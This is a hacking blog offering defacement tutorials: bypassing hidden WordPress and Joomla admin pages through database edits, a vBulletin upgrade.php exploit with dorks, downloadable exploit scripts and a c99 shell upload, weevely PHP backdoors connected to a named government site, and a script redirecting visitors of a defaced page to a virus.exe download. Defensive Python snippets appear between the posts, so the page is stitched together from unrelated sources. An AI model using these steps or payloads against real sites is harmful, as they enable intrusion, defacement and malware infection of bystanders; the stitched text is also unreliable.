Showing posts with label Defacing. Show all posts

Tuesday 18 February 2014

Getting past a wp-admin page that is hidden or redirected to the front page

Hmm... this time I will share a trick for reaching a WordPress wp-admin page that is usually hidden and redirected to the front page.

Don't give up just yet.

We sometimes run into this case when defacing with the symlink technique: we find the WordPress config, but the admin page cannot be accessed or is redirected to the front page.

Just open a MySQL interface to access the WordPress config,

then go to the wp-option table and look for "active_plugins".

After that, delete the active plugins data,

then go back to the victim website's wp-admin and try to access it.

Ta-da... the wp-admin page appears, which means the WordPress login page can now be accessed.

happy hacking
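A defender-side check for the tampering described in this post, as an added example that is not part of the original post: it parses the PHP-serialized `active_plugins` value and compares it with a known-good baseline, so a wiped or hand-edited value is reported. The option values are constructed samples, and `hide-login-demo/hide-login.php` is a hypothetical plugin path.

```python
import re

# One element of a serialized PHP list: integer key, then a length-prefixed string.
_ELEM = re.compile(rb'i:\d+;s:(\d+):"')


def php_string_list(items):
    """Build a PHP-serialized list of strings (used only to construct samples)."""
    body = "".join(
        'i:%d;s:%d:"%s";' % (i, len(s.encode("utf-8")), s)
        for i, s in enumerate(items)
    )
    return "a:%d:{%s}" % (len(items), body)


def parse_active_plugins(value):
    """Parse the serialized list WordPress keeps in the active_plugins option.

    Raises ValueError on malformed input so a truncated or hand-edited
    value is surfaced instead of being read as an empty list.
    """
    data = value.encode("utf-8")
    head = re.match(rb"a:(\d+):\{", data)
    if not head:
        raise ValueError("not a serialized PHP array")
    pos, items = head.end(), []
    for _ in range(int(head.group(1))):
        m = _ELEM.match(data, pos)
        if not m:
            raise ValueError("unexpected element at byte %d" % pos)
        start = m.end()
        end = start + int(m.group(1))  # PHP string lengths are byte counts
        if data[end:end + 2] != b'";':
            raise ValueError("string length mismatch at byte %d" % start)
        items.append(data[start:end].decode("utf-8"))
        pos = end + 2
    if data[pos:] != b"}":
        raise ValueError("trailing data after array")
    return items


def audit(option_value, baseline):
    """Compare the current option value with a known-good baseline list."""
    try:
        # A deleted row or empty value means no plugin is loaded at all.
        current = parse_active_plugins(option_value) if option_value else []
    except ValueError as exc:
        return {"status": "malformed", "detail": str(exc),
                "missing": sorted(baseline), "unexpected": []}
    missing = sorted(set(baseline) - set(current))
    unexpected = sorted(set(current) - set(baseline))
    if baseline and not current:
        status = "all-deactivated"   # the state this post produces
    elif missing or unexpected:
        status = "changed"
    else:
        status = "ok"
    return {"status": status, "detail": "", "missing": missing,
            "unexpected": unexpected}


if __name__ == "__main__":
    # Constructed baseline: one real-world style path and one hypothetical one.
    expected = ["akismet/akismet.php", "hide-login-demo/hide-login.php"]
    for label, value in [("baseline", php_string_list(expected)),
                         ("wiped", "a:0:{}"),
                         ("row deleted", None)]:
        print(label, audit(value, expected))
```

Run on a schedule against the live option value, this turns a silently disabled security plugin into an alert; database credentials readable from the web root remain the underlying problem.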

Wednesday 15 January 2014

Getting past a hidden Joomla administrator page

Hmm... this time I will share a trick for reaching a Joomla administrator page that is usually hidden and redirected to the front page.

Don't give up just yet.

We sometimes run into this case when defacing with the symlink technique: we find the Joomla config, but the admin page cannot be accessed or is redirected to the front page.

Just open a MySQL interface to access the Joomla config,

find the extension data, go into it, look for the content_loadmodule entry and delete it,

and go to the administrator page.

OR there is another way:

choose plugins or modules,

then look for jsecure authentication and click edit.

After clicking edit, look for its key; here the key is kikams.

Now we have the key.

Time to go to the victim website and enter the administrator key:

http://websitekorban/administrator?kikams

And success: we can access the Joomla admin page.

Saturday 12 October 2013

Hacking a vBulletin forum with the upgrade exploit + uploading a backdoor shell

This tutorial shows how to exploit a website that runs the vBulletin CMS.

OK, let's get straight to it.

First we need a dork:

Inurl://install/upgrade.php
intext:vBulletin 4.2.1 Upgrade System
intext:vbulletin-style.xml

Copy one of these dorks and enter it into Google to find websites that are vulnerable to the exploit.

After that, open the site

and add the exploit path
/install/upgrade.php

for example: http://websitetarget.com/install/upgrade.php

Then press Ctrl + U on the page
and you will be taken to the page's source code.

Look for CUSTNUMBER.

After copying the custnumber, download the script:

https://dl.dropboxusercontent.com/s/rmk6y85fr7g11vo/0dayVbulletin-upgrade.php?token_hash=AAGnO5qdtsLUZtvgE87xJo10mNIXjA4gZQbbQBfwTD4w9g&dl=1


After downloading, upload the script to your own hosting,

or you can use mine:

http://partisikantor-sms.com/clearbox/language/en/0dayVbulletin-upgrade.php
After that,
copy in the victim URL,
fill in customer id with the custnumber copied earlier,
and set the username, password and email to whatever you like.

Then we INJECT

and success.

If it worked, go back to the victim website and log in to its admin panel:
http://websitekorban.com/adminpanel

Then log in with the username and password created earlier.

It worked; now our goal here is to plant a PHP backdoor to hack the site.

done . .

Next, append /plugin.php?do=files to the URL after /admincp:
http://webstarget/admincp/plugin.php?do=files

You will then be taken to the place where the shell is uploaded.

Now download a backdoor shell with the .xml extension:

download shell --> https://dl.dropboxusercontent.com/s/a3ub3oj8at75zxb/c99.xml.rar?token_hash=AAGfbp-U3BPYVEMzudsOOOpHW4a5eijwfV6yblNpnv6v9w&dl=1

then upload/import it.

Once the upload has finished, check
http://webtarget.com/admincp/subscriptions.php

and the backdoor is now planted on the site.

Now it's up to you whether to deface it or do something else.
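Detection logic for the request sequence this post describes, as an added example that is not part of the original post: it flags any client that gets a 200 from `/install/upgrade.php` and correlates that with a later request to `plugin.php?do=files` from the same address. The log lines are constructed samples in Apache combined format, and the default `/admincp` directory name used on this page is assumed.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2013:10:01:12 +0000] "GET /install/upgrade.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Oct/2013:10:09:03 +0000] "GET /admincp/plugin.php?do=files HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Oct/2013:10:10:15 +0000] "GET /admincp/subscriptions.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Oct/2013:11:00:00 +0000] "GET /install/upgrade.php HTTP/1.1" 404 310 "-" "Mozilla/5.0"
198.51.100.33 - - [12/Oct/2013:11:30:00 +0000] "GET /admincp/plugin.php?do=files HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def classify(path, status):
    """Map one request to a stage of the sequence, or None if unrelated."""
    parts = urlsplit(path)
    p = parts.path.lower()
    if p.endswith("/install/upgrade.php") and status == 200:
        return "install-reachable"      # install directory was never removed
    if p.endswith("/admincp/plugin.php") and "files" in parse_qs(parts.query).get("do", []):
        return "plugin-import"          # product/plugin import screen
    return None


def analyze(log_text, window=timedelta(hours=24)):
    """Return findings as (kind, client_ip, request_path) tuples, in log order."""
    findings = []
    last_upgrade = {}   # ip -> time of the most recent successful upgrade.php hit
    reported = set()    # ips already reported for install-reachable
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue    # skip lines that are not in combined format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        kind = classify(m["path"], int(m["status"]))
        ip = m["ip"]
        if kind == "install-reachable":
            last_upgrade[ip] = ts
            if ip not in reported:
                reported.add(ip)
                findings.append(("install-reachable", ip, m["path"]))
        elif kind == "plugin-import":
            seen = last_upgrade.get(ip)
            # An administrator importing a product with no prior upgrade.php
            # hit from the same address is normal and is not reported.
            if seen is not None and ts - seen <= window:
                findings.append(("upgrade-then-plugin-import", ip, m["path"]))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

An `install-reachable` finding on its own already calls for deleting or access-restricting the install directory; the correlated finding is the one to treat as a likely compromise.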

Saturday 3 August 2013

How to backconnect to a server in order to root it

This tutorial explains how to backconnect to a server easily without a port, unlike netcat, on BackTrack and on Windows.

1. On BackTrack

Here I use the weevely.py tool that already ships with BackTrack 5,
but there is a Windows version as well.

Even better, weevely needs no IP forwarding/NAT setup on the router, so it is simply plug and play.

Now, what is a backconnect?

backconnect = connecting the attacker to the victim
so that the attacker can issue commands on the victim machine

OK, first I will show how weevely works on BackTrack.

Open a terminal and go to the directory /pentest/backdoors/web/weevely

cd /pentest/backdoors/web/weevely

After that, create the backdoor shell along with its password with the command

./weevely.py generate 123456 /root/shell.php

Replace the text in green with your own password
and the text in red with a name of your choice.

Here I named the weevely output shell.php.

After that the PHP backdoor shell is created in the root folder,

and now upload the newly created backdoor to the target website where a shell is already planted.

After that, call the file that was just uploaded:

http://websitetarget/path/shell.php

After the PHP has been executed, go back to the weevely terminal and enter the connect command:

 ./weevely.py http://vsi.esdm.go.id/bencana/shell.php 123456

Replace the text in blue with the address of the target shell.php and the text in red with the password created earlier.

And success: we are on the victim's local machine.

2. On Windows

First download Python and its dependencies --> https://dl.dropboxusercontent.com/s/95dgtfd8zx406fr/Python275.rar?token_hash=AAGBUkk701PTlNWTYWNP9qBrI583EiZQiJrjN7tSeyRnMQ&dl=1

Then install it... just install it in the C: directory.

After installation, the Python27 folder is created.

Then download the weevely tool --> https://dl.dropboxusercontent.com/s/8uw2u0z787ps9oh/weevely.rar?token_hash=AAHB_Z2MgYItAfIypOfpqZHm74UVpv2LuGd0LnUpqNdcnQ&dl=1

After the weevely tool has been downloaded, extract it into the Python27 folder; it is best to create a new folder named apps and extract it there.

After extracting, create an empty .php file with Notepad and save it in the weevely folder.
Here I named it test.php.

Then open cmd by pressing Windows + R and go to the directory python27/apps/weevely

cd/
cd /Python27/apps/weevely

Then type the command
 main.py -g -o test.php -p 123456
 test.php = the empty file from earlier
123456 = password

Now the empty file contains the PHP code from Weevely.

Time to upload it to the victim website where a PHP backdoor shell is already planted.

Go back to cmd and call the test.php file:

main.py -t -u http://alamattarget.com/path/test.php -p 123456
Replace the text in red with the address of the PHP file uploaded to the target.
The text in green is the password we created earlier.

And we are in on the victim server's local machine.


Friday 2 August 2013

SQL injection dorks

Here are some SQL injection dorks to share.
Enter one of the keywords below into the Google search box.


Wednesday 17 July 2013

Embedding a virus in an HTML page or deface page

First of all,

upload your virus through the shell on the defaced site.
Once it has finished uploading, copy the address of the virus; for example, the virus you uploaded through the shell is at http://alamatweb/image/virus.exe

Copy the following code into your HTML / deface file; remember that it must be pasted before the </html> tag or inside the HTML body.

<script type="text/javascript">
<!--
function exec_refresh()
{
window.status = "Redirecting..." + myvar;
myvar = myvar + " .";
var timerID = setTimeout("exec_refresh();", 150);
if (timeout > 5)
{
timeout -= 5;
}
else
{
clearTimeout(timerID);
window.status = "";
window.location = "alamat virusmu";
}
}
var myvar = "";
var timeout = 190;
exec_refresh();
//-->
</script>

For example, inserted into my deface page it becomes: -->

 <html>

<style type="text/css">
   


 |</div>
body {
    background-color: black;
}
//.matrix { font-family:Lucida Console, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
.matrix { font-size:17pt; text-align:center; width:20px; padding:0px; margin:0px;}
</style>
<center><font face="Verdana" size="2" color="#FF0000">GOTCHA :P LOL </font> |
     <script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template=Your IP: <IP>"></script> <font color="#ff9900"> | </font> <script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template= <isp>"></script><font color="#ff9900"> | </font><script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template= <country>"></script> <font color="#ff9900"> | </font> <script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template= <flag>"></script></center>
<link rel="SHORTCUT ICON" href="http://i55.tinypic.com/2z7ld11.gif">
<body style="background-color: black;"><title>### HACKED BY TrojanzBoy###</title><center><div style="font-family: impact; font-size: 25px; color: red; background-color: black; padding-top: 2px; text-align: center; line-height: 75px; height: 75px;">


<div align=center id="matrix"}>
  <style type="text/css">b.drop-shadow { text-shadow: 0 0 2px #ccc; }</style><font color="red"><b class="drop-shadow"><b>.:: P0wn3d By TrojanzBoy ::.</b></font></b>     

       
</div>

<html>
<title>./P0wn3d By TrojanzBoy</title>

<body bgcolor="#000000" text="white">
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>

<center>


<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOt9ara02ky_YPh1Ose0WcCOoIHsgU1y5bm2mUjgzGelWcmDHrVpOPPw7QjsZXpoW8yJYcYd4qi_fPGH5rM1mEP4t6cZ7Vs_oKo6pcBz-cJcXVGT7s4VocY7CeZPWoBebsYAv1aMsVa08/s1600/anak-pemulung.jpg" height="480px"></img>

</center>
<center>

aku hanyalah seorang pemulung web . . . !<br>
</center>
<small>

</font>
</a>

</i>
</small>

</p></center>


<script type="text/javascript">
<!--
function exec_refresh()
{
window.status = "Redirecting..." + myvar;
myvar = myvar + " .";
var timerID = setTimeout("exec_refresh();", 150);
if (timeout > 5)
{
timeout -= 5;
}
else
{
clearTimeout(timerID);
window.status = "";
window.location = "http://narutoupdate.strangled.net/virus.exe";
}
}

var myvar = "";
var timeout = 190;
exec_refresh();
//-->
</script>

</body></html>


</marquee></a>
<center>
    <embed src="http://videokeman.com/music/videokemanplay.swf" width="1" height="1" wmode="transparent" FlashVars="playerID=1&amp;bg=0xffffff&amp;leftbg=0xCA4536&amp;lefticon=0xffffff&amp;rightbg=0xCA4536&amp;rightbghover=0x999999&amp;righticon=0xffffff&amp;righticonhover=0xffffff&amp;text=0xCA4536&amp;slider=0x303030&amp;track=0xFFFFFF&amp;border=0x666666&amp;loader=0xC52C24&amp;autostart=yes&amp;loop=yes&amp;soundFile=http://videokeman.com/dload/nm3/053011/Alexandra_Stan_-_Mrxdot_Saxobeat.vkm"></embed>
</body>
</center>

<html>

That's all from me.
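A scanner for the pattern shown in this post, as an added example that is not part of the original post: it extracts inline script bodies from an HTML file and reports any `location` assignment whose target is an executable download. The sample pages, the `example.invalid` host and the extension list are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# File types a browser hands to the OS instead of rendering (assumed list).
EXECUTABLE_EXT = (".exe", ".scr", ".msi", ".bat", ".cmd", ".pif")

# location = "...", location.href = "...", location.replace("...") and
# location.assign("..."), with an optional window./document./top./self. prefix.
LOCATION_RE = re.compile(
    r"""(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*
        (?:=\s*|\.(?:replace|assign)\s*\(\s*)
        (["'])(?P<url>.*?)
        \1""",
    re.VERBOSE | re.IGNORECASE,
)


class ScriptCollector(HTMLParser):
    """Collect the text of every inline <script> element."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data


def find_executable_redirects(html_text):
    """Return the URLs of script-driven redirects that point at executables."""
    collector = ScriptCollector()
    collector.feed(html_text)
    collector.close()
    hits = []
    for body in collector.scripts:
        for m in LOCATION_RE.finditer(body):
            url = m.group("url")
            # Compare only the path, so query strings do not hide the extension.
            if urlsplit(url).path.lower().endswith(EXECUTABLE_EXT):
                hits.append(url)
    return hits


# Constructed sample with the same shape as the snippet in this post.
SUSPECT_PAGE = """<html><body>
<script type="text/javascript">
<!--
var timeout = 190;
function exec_refresh() {
  if (timeout > 5) { timeout -= 5; setTimeout("exec_refresh();", 150); }
  else { window.location = "http://files.example.invalid/image/update.exe?x=1"; }
}
exec_refresh();
//-->
</script>
</body></html>"""

# Constructed benign page: a comparison and a redirect to a normal page.
CLEAN_PAGE = """<html><body><script>
if (window.location == "/home") { window.location.href = "/login.php"; }
</script></body></html>"""

if __name__ == "__main__":
    print(find_executable_redirects(SUSPECT_PAGE))
    print(find_executable_redirects(CLEAN_PAGE))
```

Running it over a web root during incident response, or as a file-integrity hook, catches this kind of injected redirect even when the visible page content looks unchanged.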

